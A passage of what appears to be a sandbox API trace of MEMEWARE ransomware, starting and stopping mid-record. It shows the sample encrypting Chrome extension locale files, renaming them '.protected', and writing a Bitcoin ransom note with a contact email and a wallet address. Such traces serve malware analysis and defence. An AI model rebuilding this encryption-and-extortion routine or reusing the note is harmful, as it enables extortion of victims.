out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x107, lpOverlapped=0x0) returned 1 [0079.363] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.363] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.363] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.363] CloseHandle (hObject=0x168) returned 1 [0079.363] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.protected") returned 166 [0079.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.protected")) returned 1 [0079.364] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.364] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.364] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\RESTORE_FILES.txt") returned 160 [0079.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.365] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.365] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.365] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.365] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.366] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.366] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.366] CloseHandle (hObject=0x164) returned 1 [0079.366] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0079.366] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0079.366] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu") returned 142 [0079.366] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0079.366] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0079.366] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*") returned 144 [0079.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.366] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.366] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.366] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.366] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.366] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.366] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\.") returned 144 [0079.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.366] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.367] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.367] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.367] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.367] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.367] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\..") returned 145 [0079.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.367] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.367] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.367] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.367] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.367] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.367] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.367] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.367] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0079.368] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.368] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.369] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.369] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.369] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.369] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.369] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.369] CloseHandle (hObject=0x168) returned 1 [0079.369] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.protected") returned 166 [0079.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.protected")) returned 1 [0079.370] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.370] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\RESTORE_FILES.txt") returned 160 [0079.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.370] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.370] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.371] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.371] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.371] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.371] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.371] CloseHandle (hObject=0x164) returned 1 [0079.371] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.371] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0079.372] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id") returned 142 [0079.372] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0079.372] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0079.372] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*") returned 144 [0079.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.372] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\.") returned 144 [0079.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.372] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.372] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\..") returned 145 [0079.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.372] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.372] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.373] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.373] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.373] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.373] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.373] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.374] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.374] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0079.374] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.374] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x105, lpOverlapped=0x0) returned 1 [0079.375] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.375] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x105, lpOverlapped=0x0) returned 1 [0079.375] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.375] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.375] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 